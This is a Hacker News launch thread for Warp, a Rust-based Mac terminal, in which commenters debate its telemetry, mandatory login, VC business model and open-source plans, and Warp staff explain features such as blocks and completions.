Hacker News new | past | comments | ask | show | jobs | submit login
Show HN: Warp, a Rust-based terminal (warp.dev)
946 points by zachlloyd on April 5, 2022 | hide | past | favorite | 726 comments
Hi HN community,

I’m Zach, founder and CEO of Warp, and am excited to show you Warp, a fast Rust-based terminal that’s easy to use and built for teams. As of today, Warp is in public beta and any Mac user can download it. It works with bash, zsh, and fish.

The terminal’s teletype-like interface has made it hard for the CLI to thrive. After 20 years of programming, I still find it hard to copy a command’s output; I always forget how to use `tar`; and I always have to relearn how to move my cursor. To fix fundamental accessibility issues, I believe we need to start innovating on the terminal, and keep pushing further into the world of shells, ultimately ending up with a better integrated experience.

At Warp we are building a Rust-based terminal that keeps what’s best about the CLI while modernizing the experience. We’ve built

1) An input area that works just like a code editor: selections, cursor positioning and completion menus 2) Grouped commands and outputs: so you can easily copy, search, and share terminal outputs 3) AI-powered Command Generation and Community-sourced Workflows [0]: so you can find useful commands without leaving the terminal 4) The ability to share your outputs with teammates: no more pasting long unformatted code into Slack 5) Project Workflows: save your team’s common commands into your project so your teammates can run them from Warp See a demo here: [1]

We built Warp in Rust with GPU-accelerated graphics, and along the way we built our own UI framework, a text editor that’s a CRDT, and an out-of-the-box theming system. You can learn more here [2]. Huge thanks to our early collaborators: Atom co-founder Nathan Sobo, Nushell co-founder Andres Robalino, and Fish shell lead developer Peter Ammon.

We are planning to first open-source our Rust UI framework, and then parts and potentially all of our client. As of now, the community has already been contributing new themes [3]. And we’ve just opened a repository for the community to contribute common useful commands. [4]

Our business model is to make the terminal so useful for individuals that their companies will want to pay for the team features. We will never sell your data.

We are calling today’s release a “beta” because we know there are still some issues to smooth out. You will notice that a log-in is required and that we do collect usage data and crash reports. We do so to enable team features and also to keep improving the product. Post-beta, we will allow users to opt out of usage data. You can see our privacy policy here [5].

While it is a “beta”, we are confident that even today the experience is meaningfully better than in other terminals. If you use a Mac, please give it a shot at warp.dev and let us know how it goes. Otherwise, sign up here [6] to be notified when Warp is ready for your platform.

Join our community on Discord [7] and follow us on Twitter [8]

Let me know what you think! Ask me anything!

[0] https://docs.warp.dev/features/workflows [1] https://youtu.be/X0LzWAVlOC0 [2] https://blog.warp.dev/how-warp-works/ [3] https://github.com/warpdotdev/themes [4] https://github.com/warpdotdev/workflows [5] https://warp.dev/privacy [6] https://github.com/warpdotdev/warp/issues/120 and https://github.com/warpdotdev/Warp/issues/204 [7] warp.dev/discord [8] twitter.com/warpdotdev




There are some legitimate concerns about Warp throughout these comments (telemetry, business model, etc.).

But the one thing that really excites me is to have a full team working full-time on building the terminal that developers want to use. They're doing real user research, talking to developers, and taking feedback in forums like HN seriously - and using up millions of VC-dollars building a new version of this fundamentally important core utility. I'd much rather have that VC money go toward an attempt at a better terminal than some ML or web3 startup.

I think this doesn't usually happen? All the terminal emulators I've used usually open-source projects developed in someone's free time. Don't get me wrong, projects like Alacritty, urxvt, xterm, Terminator etc. are amazing for the funding they have (I think mostly $0?), but I'm super excited to see what a cohesive terminal based on real UX research can look like.


> using up millions of VC-dollars building a new version of this fundamentally important core utility

It's nice to think of this as 'taking advantage of' VC dollars, but VC dollars come with strings attached, namely the need for an 'exit'. The exit only happens if the company in question makes multiples of what it invested, meaning that VC-funded companies need significant revenue from their users. These days, the growth required for an exit leads to: 1) advertising being laced into a product, 2) user data being sold or otherwise monetized, or 3) charging you a monthly subscription fee.

Maybe this time it's different—there are theoretically other VC-friendly business models that work for software—but I struggle to see how.

Open-sourcing the application from the beginning would certainly give more confidence here.


I'm already wary of creating accounts on VC funded apps. Surely there are others like this too. I'm just tired of being burned by the cycle you just described, eventually value must be extracted and usually that means a tradeoff of user values versus budget values and I'm not here for that anymore.


Thanks kyeb. I agree with both points here - we need to be very careful and sensitive in terms of how we build this product from a privacy and security perspective, but we see the opportunity mostly the same way you do.

There are some great open source terminals out there, but having the opportunity to rethink it with a team of dedicated full-time engineers I think gives us an opportunity to build something really powerful and useful.


Not to mince words, but so far you've made a very basic series of unforced errors on both privacy and security. This is perhaps to be expected, as glancing at your About page, you don't seem to have any security or privacy specialists on staff. I don't even see a security page or contact info.

Warp is starting to read like a Product-driven startup. The kind where people figure security and privacy are little features you can just throw in at the end of the dev cycle and advertise until then. It's not like anybody is going to actually check or care, right?

It's an understandable error in a visionary. Yet it's not the kind of mindset that produces trustworthy, secure, privacy-respecting enterprise products that companies happily pay lots for.

You're absolutely right. Warp needs to be very careful and sensitive about privacy and security. It may be worth reflecting on why you haven't been so far.


There is a lot of constructive value in this comment, I hope it is internalized and thought about


For sure - one of my main takeaways from our ShowHN is that there's a ton of reasonable concern around login, telemetry, and open source that we need to address. We are going to come back to HN as we do that.

The HN community has a different default perspective than I have on a lot of these issues, but a perspective that matters to a ton.


The specific concerns identified here can be thought of as symptoms. I invite you to contemplate what cause they might share. Addressing specific issues around telemetry, openness, and logins without fixing the underlying organizational concerns will leave you playing whack-a-mole forever.

Since you get our collective concerns, I look forward to seeing how you address the organizational issues here.


Yeah I think some folks are seeing this and thinking the terminal is the product, when in reality the devops platform is the real product here and a slick terminal emulator is one component of that platform. Enterprises pay good money to companies like Redhat, Teleport, etc. for similar kinds of devops collaboration/security platforms.


where's the devops platform?

if all they have to offer us is the terminal, then their product is the terminal


it's a good question. today warp is a terminal as you say. the hope is that we can build a platform around the command-line, but we decided by trying to start with the terminal's fundamental UX to see if we could improve it. in order to make a platform we believe first we need a great product that folks want to use.


Everyone offering "platforms" these days. It's getting really tired and I can't be bothering to pay attention. Tools is where it's at, not platforms.


Warp wants to john deere-ify our tools. Soon you won't be able to buy a hammer or table saw without some sort of platform marketing speak and a subscription service.


Spirit Airlines of the Command Line.


If you want to use a terminal that is actually open source and doesn't have telemetry, much less only available via signing in with GitHub, use Alacritty, also written in Rust and cross platform.

https://github.com/alacritty/alacritty


Or alternatively wezterm, also open source, without telemetry, in Rust, and cross platform.

https://github.com/wez/wezterm


Wezterm is the best of the bunch I've tried, but I just keep going back to MATE terminal.


I use Konsole. It's written in I-dont-know-and-dont-give-a-shit-why-is-that-even-relevant.

It's free, does not spy on me, comes by default with Kubuntu and has great themes out of the box (including the Solarized themes).


> It's written in I-dont-know-and-dont-give-a-shit-why-is-that-even-relevant.

Same. But boy to people really like tools "written in Rust".


If you knew you could double your upvotes and praise by including that phrase why wouldn't you? I mainly write Go these days but when I submit my next tool to HN I'm just going to name it YadaYada Pro Written In Rust and retire on all the resulting upvotes. Its a foolproof plan and don't you dare judge me for it.


C++ mostly ;)


First of all, we love Alacritty: our terminal model code is based on Alacritty’s model code. We’re grateful that a few of the collaborators reviewed our early design docs.

We think the two products are meant for two different audiences.

Alacritty has a very minimalist philosophy that suits some terminal power users very well. It’s geared towards folks who are familiar with more advanced tools like tmux, and who are comfortable doing advanced configuration in the shell. For instance, Alacritty has no tabs: users are expected to use tmux.

With Warp, you get similar performance to Alacritty (we are both Rust-based, GPU-accelerated native apps, and Warp leverages some of Alacritty’s model code) But you also get many more built-in features that we think make all developers more productive, like:

- Blocks (grouping commands and outputs together)

- A modern text editor for your input

- Features like Workflows and AI command search that help you perform tasks faster

- Tabs, native split panes, and menus


I use alacritty every day, it’s the best terminal emulator I’ve come across.

That said, it’s not perfect. For example it lacks font ligature support, and there appears to be no prospect of that being implemented. I don’t care about ligatures that much anyway, so no big deal for me, but for others it is.

My experience using terminal emulators is that they are all flawed in at least one way. Whether it’s lack of true colour support; lack of ligature support; weird text rendering; weird colours; confusing configuration; etc. I feel like a terminal supporting all of those things must be possible, but I haven’t come across it yet.


Kitty has the features you're looking for, such as font ligature support. If you're on Windows, I just use the Microsoft Terminal.


Or Kitty, which does more or less the same things but includes split and tabs and other convenience features.


Kitty is cool, I use it on debian, but it is not cross-platform. So I hesitate to compare it to alacritty.


Oh hell, you are right! I’m only using linux and OSX now, and it works on both, so I’d never considered it might not work on windows.


It is a little bit unfortunate that alacritty is licensed under Apache, which means it can be forked into proprietary software like this. If it was gpl like kitty, the authors would have had no choice but to make it fully open source from the start.


Actually, the ability to re-license has more to do with who owns the copyright than it has with what the license is. A problem with a lot of GPL and AGPL software is that the copyright holder is a single corporate entity that insists on a copyright transfer for every OSS contribution. Often the whole point of using the GPL or AGPL license by these companies is that they are so restrictive that their customers have an incentive to buy a commercial license.

Nothing wrong with that of course and a valid business model. But it can become a problem when they choose to switch license or withdraw their product from the OSS market entirely (like Elastic did this last year). OSS where the individual contributors retain their copyright are much more robust. For example, Linux will never change license. It would be a legal nightmare to do that. They'd be chasing tens of thousands of copyright owners for their permission, or in some cases their surviving relatives. Every single one of them would have the power to say no. It would probably be cheaper to build a completely new OS kernel from scratch than to do that. Some companies that take issue with the license conditions actually are doing that. It's probably a big reason why Google is working on Fuchsia for example.

A lot of Apache software has distributed copyright ownership. Particularly everything hosted by the Apache Foundation. Nothing wrong with that license. Great software. Has existed for decades, will continue to exist for centuries.


They would not have used alacritty in that case.


Well, it doesn't look like they will be giving back. They will open source some things yes, but it doesn't look like it will go back into alacritty.


Which means it effectively makes no difference (for Alacritty) whether they use it or not.


Or just use xterm. It's blazing fast and even supports GPU acceleration if you are using a video driver that uses Xorg's GLAMOR acceleration framework. It has close to the lowest latency of any X terminal, as well. It has a reputation for being slow because it actually commits each character or terminal command to the display, you know, like a real terminal would. If you set the fastScroll X resource to true, xterm will behave like other terminal emulators and enable a speed hack that makes it skip display updates.



This is perhaps slightly orthogonal to the main discussion here on this thread, but I have a question for Zach (and the various engineers posting on this thread):

Did you guys talk to real-world users while building this and before this launch?

This whole blow-up re: your telemetry / open sourcey'ness seems like it could have been avoided. I'm curious if you actually floated these ideas with real world users and a) everyone else is cool with it but the HN crowd is super put off by it, b) everyone is super put off by it but you decided to launch anyway, or c) you didn't actually check with real-world users and hoped for the best.

Sorry if that sounds snarky - it's not my intent. I'm genuinely curious here as a product person / entrepreneur / builder, etc.


There's an active Discord with 700+ Warp users. I reported issues on it and immediately got helpful replies. They're talking to lots of real-world users.

My take is that the hacker news crowd is not the target market for Warp. I think it does an amazing job of making the terminal easy and friendly to infrequent users. I'd recommend it to anyone who tells me they prefer a git GUI interface over the shell because of how confusing the shell is. (this is where Warp's completions really shine)

But if you're already very comfortable in the shell and have a customized setup there's some very rough parts of Warp. Lack of any compatibility with existing bash/zsh completions is the huge deal breaker for me.

Also you'd be surprised at the number of software engineers that really don't care how many sentry logging calls their apps make. I completely agree with the sentiment, and I personally just disable the Warp application's internet access to address this, but it's worth recognizing that we're in the minority of people that care.


> Also you'd be surprised at the number of software engineers that really don't care how many sentry logging calls their apps make. I completely agree with the sentiment, and I personally just disable the Warp application's internet access to address this, but it's worth recognizing that we're in the minority of people that care.

I'm in this boat. I never understood why I should care if some website interacts with google apis or logs everything I do and sells it to marketers so they can sell me ads. I'll block them anyway so it'll never make a difference to me one way or the other.


how do you block them in an app like warp ?


See my other comment for what I use, TripMode, but a DNS block on *.sentry.io would block the sentry calls. I tried setting a proxy to see Warp's other network activity but only the sentry.io calls actually respect the system-wide proxy settings. Pretty annoying, though it's probably not intentional. Just takes a little more work to inspect its traffic.

Other DNS lookups it triggers:

   api.segment.io                
   app.warp.dev                  
   identitytoolkit.googleapis.com
   o540343.ingest.sentry.io      
   securetoken.googleapis.com    
   storage.googleapis.com


> I personally just disable the Warp application's internet access to address this

How do you do that? I used to use Little Snitch, but not sure if it's still the best these days.


ooops, I already replied to losvedir directly, but for everyone else on macOS I recommend TripMode: https://tripmode.ch/

It's far far simpler than little snitch. It's intended purpose is for managing low-data connections, but I leave it on all the time and use it as per-app network permission manager. The data usage tracking is also nice. By default all new apps lack network access. Takes a little bit of work to manage, and sometimes you get unexpected issues, but it's well worth it. Amazing seeing all the network activity trying to come from apps that really don't need the network at all. Like a terminal... (though for a deeper analysis I'll bust our Charles proxy with TLS interception)


Warp engineer here - thanks for writing about your experience!

As cieplik mentioned, it's true that telemetry has not been mentioned as frequently as it has been on HN.

> I think it does an amazing job of making the terminal easy and friendly to infrequent users.

As for our users, it's a combination of newer and more experienced terminal users. More than half of them are self-reported advanced or expert terminal users.


It's cool seeing Warp folks so active on here!

Some more thoughts: I've tried it a bunch, and my big issue with Warp is it just throws away a bunch of the more obscure/advanced shell features and pretends like they were never there. The sheer inelegance of it just pains me. Like if Warp wants to destroy my custom zsh keybindings, ok, but at least tell zsh that so they don't appear when I run `bindkey` to list them. Or at least pass along the key events to the shell when a shortcut is pressed that Warp doesn't already know about. Right now it just eats my custom bindings and does nothing with them.

Also my fzf history searching is also thrown away along with my keybindings to kill a line AND put it in the system pasteboard. (That's an awesome feature that Warp should just do) The other big one for me is completions. It's hard for me to imagine an expert terminal user that's never written their own completions, or if they have, is happy throwing them away.

I really like the idea of someone re-imagining the shell+terminal, but Warp is occupying this awkward middle ground between a terminal emulator and a shell. I wish it would either be a new shell with an integrated GUI interface, or be a terminal emulator that actually lets the shell do everything it knows how to do.


It's got 700 upvotes atm but not HN's audience? Okay...


This is a great answer. Thank you!


Hey - in general, yes, we do talk to our Users on a regular about the product (in fact, I first participated in the research session, and only after that decided to join the company).

I assume you're asking specifically about discussing telemetry and open source, not only the features. We try to be super open about collecting the data, and published an extensive list of things we report. Most of our users don't mind. Those that did, messaged us directly about it and shared their feedback. Some even decided to trust us after exchanging emails, talking to the team and seeing us improving the messaging based on their feedback.

Regarding open source - it is not just a vague promise. We do have plans on doing it, many team members joined the company because they want to contribute to the community. We actively discuss this topic with our community on Discord and Github. I'm personally super excited about our UI framework, and can't wait until we open it up to other people (we recently added some a11y support, which is super cool and not as common among the Rust frameworks). Here's the github discussion for more context: https://github.com/warpdotdev/Warp/discussions/400

However, we understand that our current mode of operation won't (and honestly, can't) please everyone, so it's not surprising that there are people who don't agree with this approach.


Why did you not just make telemetry and logins opt-in? That avoids the entire issue from day one.

I think that's what is giving people a strange feeling about this. You prioritized your own desires (not needs mind you) rather than your users. And if your thinking is so off that you really think these are needs during the beta then that is even more worrying.

If I were in your shoes I'd crunch immediately to make telemetry, crash reporting, and logging in three separate opt-in features then get a build out ASAP. Prompt people to enable or disable each with clear language in a single screen (no EULAs or lawyer weasel words) and no dark patterns (like double-negative checkboxes or flipping cancel and accept button colors).

For crash reports and logins there is an even better way to handle this that is respectful of your users without being obtrusive and shows you are working hard to earn trust. Then you only need one post-install prompt to ask permission to share data which is much simpler.

1. Ask the user each time you find a crash report and let them inspect it if they want to do so, then ONLY send the content the user inspected (no hidden payloads, extra HTTP headers, etc). Include a checkbox/dropdown "Always send" or "Never send". The default is to ask the user to help you out. It gives transparency by letting them inspect the entire payload. And if/when you've earned their trust they will click Always on their own. It also covers you just in case the payload accidentally picks up something sensitive.

2. When the user invokes a feature that actually needs a login then prompt them at that time. Or if the context doesn't allow that, show an unobtrusive icon, link, or banner in a context-appropriate way that lets them create an account or login.

3. For sharing let users share things anonymously with links, no account required. Once they've started using the feature let them know they can create an account to "claim" the things they've shared. This can be a good way to show people the benefits rather than just claiming benefits exist. It makes a nice on-ramp without pestering or annoying people who never create an account. And the people they share things with may end up becoming your users.


> Why did you not just make telemetry and logins opt-in?

While I'm not them, I can answer this. Users did ask for this as much as they asked for other things.

> You prioritized your own desires (not needs mind you) rather than your users.

That's an awfully big assumption to make, and one that does not conform to reality.


Will Wrap licensed under a FOSS license (any of those approved by OSI or FSF) after being open sourced?


Thank you for answering! So it really just sounds like an impedance mismatch between Warp and the HN crowd.


> Some even decided to trust us

You could also be that special someone to trust us. Let's trust each other.


Is it possible that this is blowing up only on HN and the privacy thing is not regarded as so important in other communities?


Don't know. I downloaded the image, installed it and was greeted by a mandatory login. Next step was uninstall and delete the dmg image. What a waste of time.


That’s my option (a) above. I too am curious!


We spoke with a lot of users (someone mentioned our discord which has thousands of members) and there are thousands of developers using Warp every day (prior to this ShowHN).

We also were expecting some of this response from the HN community, and understand it.

The short answer to your question is that different developers care about different things. A lot of developers are OK with login, telemetry etc (we are not the only tool that has these things), and they exist in our case because it helps us produce a better product experience.

That said, I don't want to dismiss your question - we needed to do a better job understanding the perspective of more developers, and the response on HN has made that very clear. We are going to take the feedback and adjust course.

Thank you!


what is it to talk about? Anything to be discussed about telemetry as a general concept, has been discussed in other products at some point. I personally think the paranoid toward telemetry is just an ideological one, I doubt people can articulate exactly how telemetry is detrimental to them.

I would not blame companies for adding telemetry for improving their product (instead of tracking user), and not explicitly tell the paranoid mob about it, as if to give them excuse not to use the product. It's not like they won't find out anyway.


> I doubt people can articulate exactly how telemetry is detrimental to them.

It’s not hard to articulate. Here’s Der Spiegel’s 2013 reporting on the NSA’s use of Windows telemetry for passive observation of targets:

> The automated crash reports are a "neat way" to gain "passive access" to a machine, … [this] provides valuable insights into problems with a targeted person's computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim's computer.

> In one internal graphic, [the NSA] replaced the text of Microsoft's original error message with one of their own reading, "This information may be intercepted by a foreign sigint system to gather detailed information and better exploit your machine."


This is neat, but I'm not convinced it's going in the right direction.

It's not open source, and "maybe it will eventually be" is unacceptable for such a core component of an engineer's workflow. Most of the features on the front page are "coming soon," not actually available. There's no timeline for support for non-Mac OS systems, and it's built using Metal rather than any cross-platform API, so it will be at least moderately difficult to port. (Isn't the whole point collaboration?) It is "blazingly-fast" but has no benchmarks for latency or startup time.

The team raised money because "[b]uilding a terminal is hard," and the business model seems reasonable - build a terminal people like, and then get businesses to pay for it - but I'm hard-pressed to find a use case that would benefit from the upsides of this tool which isn't also utterly hamstrung by its shortcomings, at least currently.

Yeah, maybe you can justify it at an all-Mac dev shop, but at the last all-Mac place I worked we did everything this currently does with iTerm (free) and Tuple, and frankly I don't see this obviating the need for Tuple in that use case. (EDIT: Tuple also works fine on Linux, and of course there are myriad excellent terminals for Linux.)

Perhaps most importantly, though, this FAQ entry concerns me:

> Every session you work on your desktop can be backed by a secure web permalink. It opens into a browser tab that shows your terminal state and allows readers to scroll and interact with the read-only elements. You might use this for yourself: so you can view and run commands on it while you're away from your machine. Or you might share it with a coworker for debugging.

First of all, is this actually available at the moment? I think not, since "Web (WASM)" is still on the roadmap.

Second, "secure" is doing a lot of work here. What's the threat model Warp considers themselves secure against? How are these sessions allocated? Does every terminal start in a connected state, or is the connection only made once the user opts in? Are the terminal sessions E2EE? Are they exposed to Warp's internal systems? If so, what is stopping any attacker who makes it into Warp's network from remotely monitoring and controlling user machines? If Warp says it _is_ E2EE or otherwise secured in this manner, how can we trust them when it's not open source?

This seems too risky to be worth using seriously, and perhaps too risky to even try out.


Yeah, I just got an invite code yesterday, but given this I may opt against using it - this seems like a real risk for leaking env vars, credentials...I don't so much mind stuff like Segment and Sentry, but I'd love to see some details from someone familiar with the project around the same questions you raised regarding the web-integrated functionality.


1000s of developers use Idea's IntelliJ, Webstorm and GoLand. Only the community edition of IntelliJ is open source.

Software doesn't need to be open source for it to be adopted, if they have the right security practices and I'm sure for enterprise contracts they will have the right level of information available under NDA when GA.


Enterprise contracts also include clauses spelling out financial consequences of major screwups. If Jetbrains screws up and a customer's passwords go everywhere, I'd bet the contract makes Jetbrains at least a bit liable.

I doubt Warp offers a clause like that.


You're comparing a 10+ year old company with a company that has a product in beta. I don't think this is a valid comparison. I'm sure they'll provide enterprise level contracts and support for large installation at some point.


Yes, I am. You're absolutely right. I'm doing so in order to illustrate what it is about mature closed-source enterprise software offerings that makes them acceptable to use.

Otherwise it amounts to using a random binary blob and hoping it does what you want it to. Without any ability to check its internals yourself (short of RE) or any legal backing.

Some might opine that that's completely reasonable, but I think many might find it an unreasonable risk for an enterprise to take. Regardless of how new the vendor may be.

Again, you're completely right about the comparison I am making. I hope I've been able to clarify my reasons.


Great callouts, I definitely get your concern around block sharing--that feature does exist currently in Warp but it is completely opt in on a per command basis (we never collect any command output without the user opting into it first). The way this works is that if you explicitly click "Share" by right clicking on a block, we will send the contents to our server and generate a link for you. A block can also be unshared at any point to completely delete a block from our server.

Regarding the cross-platform piece, the plan is absolutely to support different platforms. In fact we've built our own cross-platform UI framework to help us with this endeavor which you can read about here: https://www.warp.dev/blog/how-warp-works. We chose Metal to start because the Metal debugging tools in Xcode are excellent, allowing us to inspect texture resources and easily measure important metrics like frame rate and GPU memory size. Thankfully, because our graphics code is decoupled from our UI framework, porting the graphics piece of the UI framework essentially mounts to porting over a few hundred lines of shader code, which shouldn't be too difficult.


What is Tuple?

Edit: After searching for variations of “terminal” “iterm” and “tuple”, of course it’s the top hit if you just search Mac and tuple! https://tuple.app/


>It's not open source, and "maybe it will eventually be" is unacceptable for such a core component of an engineer's workflow.

That's a huge overstatement. What's unacceptable about it (or any other software for that matter) closed-source?


> What's unacceptable about it (or any other software for that matter) closed-source?

Lots of things. Lock-in for once. Warp's VC decide they want an exit and Warp becomes 50usd/month sass or some sanctions block you from using Warp. You're hole workflow, scripts etc are basically dead. Also, what is in that closed source? No one can audit it and it's literally the environment that contains all of your secrets.


Like others here, I'm leery of replacing my terminal with a VC-backed, maybe open-sourced eventually product, and a bit annoyed it claimed a name already in use in the Rust world.

But...it is exciting to see someone reimagining the terminal a bit. People frequently talk about wanting a better GUI interaction model for everyone, but the actual ideas to improve it seem to be missing, I think because the desktop status quo is really not that bad for low-learning curve systems. (In fact, I think many of the changes in the name of desktop/mobile convergence have been for the worse.) I'm way more interested in the idea of creating a hybrid text/graphic command interface for programmers. There's a much better interface waiting for someone with the vision and (more importantly) ability to create an ecosystem around it. Some ideas:

* Warp's more visual completion is super welcome. Does it work with the shell's standard completion scripts?

* Warp's blocks look like a nice step in the right direction. How do they work? I'd guess it's ANSI codes like iTerm uses to distinguish the ends of commands, although that has the downside that a broken/hostile command can impersonate the shell saying the command has ended. It'd be nice to work out some compatible yet more robust protocol. (Maybe the shell takes responsibility for piping subcommand's output through it and filtering, or maybe something else.)

* It'd be interesting to further extend blocks with some protocol that allows programs to output within their block using richer elements: non-monotype fonts, adjustable tables, etc. A little like a Jupyter notebook, maybe. Even better if it works with some richer way for programs to pipe information to each other.

* Likewise, when launching alternate-screen terminal stuff, to allow them to do more with the rectangle than a grid of text. Closer to embedding an arbitrary cross-platform network-transparent GUI, launched from the shell, occupying its rectangle.

* And at first glance, looks like it's missing tmux-like features (whether integration with tmux proper like iTerm has or its own thing). I'd want that in any richer terminal app—most of my work in terminals is on remote machines, often over flaky network connections.


I'm working on a terminal browser of sorts that is designed to browse terminal user interfaces served by servers. The idea is that no mouse input is supported and servers specify keyStrokes for links. It starts from a protobuf specification optimized for sending components over gRPC in a pageRequest/pageResponse manner.

In order to promote the idea I've been spending most of the time writing a client in Go. I think it has enough functionality that I can start writing servers that really showcase the capabilities.


This sounds like ssh apps via https://charm.sh


Yes. Thanks for this. This is very very similar to what I'm trying to do. I guess more like the subproject https://github.com/charmbracelet/wish than anything.

I suppose the difference is that I like the idea of being able to link to other servers and keep a contextual menu bar telling the user where they are. Also, in corporate environments SSH is often locked down because of what it could potentially do. This would be nice as it would be sandboxed to only what the client/server are coded to do.

Thanks for the link, this gives me some things to think about.


FWIW, I think ssh apps or something similar could be a very powerful paradigm for people who live in the terminal and a diversity of ideas here would be welcome.


Warp engineer here. Really appreciate your ideas here!

> Warp's more visual completion is super welcome. Does it work with the shell's standard completion scripts?

It does not. But we have completions out of the box for 200 commands.

Warp's input is a text editor instead of the shell input. This means we ended up building completions by hand and soon, via the community. We think this is a better experience because we can provide more in-line documentation.

> Warp's blocks look like a nice step in the right direction. How do they work?

tldr; shell hooks

Most shells provide hooks for before the prompt is rendered (zsh calls this precmd) and before a command is executed (preexec). Using these hooks, we send a custom Device Control String (DCS) from the running session to Warp. Our DCS contains an encoded JSON string that includes metadata about the session that we want to render. Within Warp we can parse the DCS, deserialize the JSON, and create a new block within our data model.

Re: impersonation: that's a good concern we will consider.

> It'd be interesting to further extend blocks with some protocol that allows programs to output within their block using richer elements.

Absolutely! This is definitely in the roadmap. We want rich output like adjustable tables and images. We also want to support a protocol so other CLI programs can use it.

> Likewise, when launching alternate-screen terminal stuff, to allow them to do more with the rectangle than a grid of text.

Yes we are thinking of supporting blocks within tmux, for example.

> And at first glance, looks like it's missing tmux-like features (whether integration with tmux proper like iTerm has or its own thing).

Yes, other than split panes, we do not have tmux-like features. We've begun mocking out what those features could look like. We are thinking of a native window management solution and a native way of saving workspace/session templates.

We are also thinking of what a deeper integration with Tmux might look like.


> This means we ended up building completions by hand and soon, via the community.

You like people to contribute for free ("build a community") but refuse to give them an actual FOSS client. This is bound to fail.

There are ways to make this go both ways though, and I hope you'll make them work once you are a bit further along in your journey. Exciting project!


Meh, I could be into it without them providing a FOSS implementation. Think of Microsoft's language server protocol. It's nice that VS Code is open source, but even if it weren't, we might still be using this protocol with rust-analyzer and neovim. Or any number of older protocols/formats with RFCs that didn't start with good FOSS implementations.

In the case of completion, if you can generate (less rich but still useful) bash/zsh/fish completion scripts from these files, program authors might be happy to use it even in the absence of a fancy terminal.


There exists multiple fully functional FOSS LSP clients. The semi-proprietariness of VS Code does not doom LSP.

The documentation people would contribute to Warp though are unlikely to have any popular FOSS clients.


> You like people to contribute for free ("build a community") but refuse to give them an actual FOSS client. This is bound to fail.

Sublime text has a pretty active community that builds and shares extensions.

Why not warp?


Sublime is selling a product that users can purchase and own

Warp is owned by venture capitalists


How about we don’t downvote the developers when they take time to answer questions?

I don’t care if it wasn’t the answer you were hoping for -this should be upvoted as it is very relevant for the conversation in this thread.


I'm wondering if the solution for the block separation could be to have separate tty (or pty?) for each block. I guess that wouldn't work too well with existing shells though


That might be interesting for supporting multiple blocks running at once without confusion, as an update to the classic shell job control. Highlighting stdout vs stderr differently, too.

Another dimension to consider is the possibility of nested blocks: subshells, ssh, programs with their own REPL, etc.


That is how I thought it worked first. That each pty executed its own shell instance and passed their environment and current working directory between them. Perhaps that would be a very naive approach that couldn't work in practice


Wanted to give it a shot but got disappointed when I launched it and the following happened:

- Outgoing request to googleapis.com

- Outgoing request to segment.io

- Outgoing request to sentry.io

- Requires sign up (only via Github, mind you)

I understand the first request is probably to get some dynamic configuration, even though I'd rather my terminal ship with static configuration. But then you have segment and sentry: not interested in sending telemetry from my terminal. Finally having user accounts for a terminal is such as strange concept.

I really wanted to like it, too. The screenshots look great


Also: security?

I expect my terminal to be a much more secure environment than my web browser. When an application starts communicating with the internet, I have no choice but to treat it with the same level of scrutiny as my browser.

Even making telemetry opt-in means that it has the capability to send information to the internet that I don’t know about, which means that I have to treat it like an application that can do that.

Honestly, this freaks me out. It’s an angle I’ve never considered before. Now I need to make sure my current terminal emulator (kitty) isn’t sending information to the internet without my permission.


Agree, this is a pretty bad deal breaker for me. Big business people doing short-sighted big business things, salivating at cramming a product full of telemetry. All without transparency around it? In a terminal of all things?? Indescribably off-putting and catastrophically damages my trust in the product and the CEO.

EDIT: To be fair there is some transparency in the original post. I was looking through the landing page for it (where it is not mentioned). Also, imho it should still be opt-in even for beta. Not everyone is going to read the wall of text to parse out the buried note on telemetry


This is why I deleted Fig (https://fig.io/) right after installing it. It must've sent some uninstall information, too, because the creator/CEO emailed asking why I uninstalled it afterwards...


Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.

Their getting started instructions [0] are all just terminal commands too, and even that doesn't mention Mac once.

[0] - https://fig.io/docs/getting-started


> Oh yea, Fig is also the one that is Mac only but never mentions that fact anywhere on their website. Everything is written to just presume that the reader is on a Mac.

Not that it is not annoying, it is, but that's pretty common with Mac-only software in my experience.


It's even more common with windows-only software.


Every single tool in the console homebrew space, I swear. And it's not like the code isn't portable, it's usually just some command-line / batch thing; but they just don't bother to compile it for anything other than Windows; and then they don't release it as OSS for you to do so, either. The number of things I've had to run under WINE...


Hmm use mac and win heavily, not found that to be the case nearly as much on win10/11.

On the rare occasion it is truly just win, it's usually made clear far more than macos only.


"Send Download link" is a huge red flag. The only reason to have such a button is to send spam.


Yikes. No thanks.


lmao the same happened to me


Hi - as the poster and founder I again completely get the concern.

We should make it even more transparent what we collect. You can see it here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel...

Re: big business, we're still pretty small, but it's true that we are trying to build a business around the command-line. I get that's controversial and it's not something that exists and that the terminal is a super-sensitive low level tool.

We will never ever build a business around terminal data, and to be super explicit, we are 100% not collecting any command inputs or outputs.

The business that we want to build is around making a terminal (or a platform for text based apps) that grows because it makes individuals and teams a lot more productive on the command line.

I've there's one thing I've taken away from this ShowHN so far is that there is a lot of well-founded concern about the terminal and user data and that we need to do a better job on this issue.


Hey Zach, while I think your post is well-intentioned, the contemporary default level of trust around tech companies and data privacy is just very low. As a new entrant to the field, you inherit the default valuation—people have no other info to go off of.

Given that, it's probably the case that the only options are to either be fully open source or to make a fully offline mode an option.

In any case, I think the concept for your product is excellent—it's been mind-boggling to me that something along these lines wasn't tackled years ago, so I look forward to your guys' future success, hopefully moving the state of terminal interaction into the modern era.


> ...the contemporary default level of trust around tech companies and data privacy is just very low...

It's not just that the level of trust is very low. I shouldn't need to place any trust in the developers of my terminal at all. If I can't know for a fact that it's not acting against my interests, then I'll pass. I already have such a big selection of fully open-source terminals available. Why would I even consider taking any king of risk with this one?


I can’t speak for you, but generally people at least consider this tradeoff because of the additional utility of the third party tool. Ideally all these features would exist in the system terminal, but that hasn’t happened, and it possibly won’t ever.


As much as I can appreciate the community’s reaction to your approach of default collection of telemetry, I can also equally appreciate you and the rest of the team sucking it up and accepting the feedback. Thanks for that, and I’m personally interested to see where you’re able to take Warp. I think there’s something potentially pretty compelling here.

My advice here would be to simply make telemetry opt-in during the beta period. I’m typically pretty liberal about opting in to telemetry (particularly when the extent of which is documented), but obviously a lot of your users will not be. Your desire to accelerate your progress seems to conflate with the needs of your target demo, and I think this warrants adjustment.


If the code is there, it is potentially exploitable. So, opt out is nowhere near good enough. If it can send to remote hosts, this can be abused. This capability should not be there, at all.

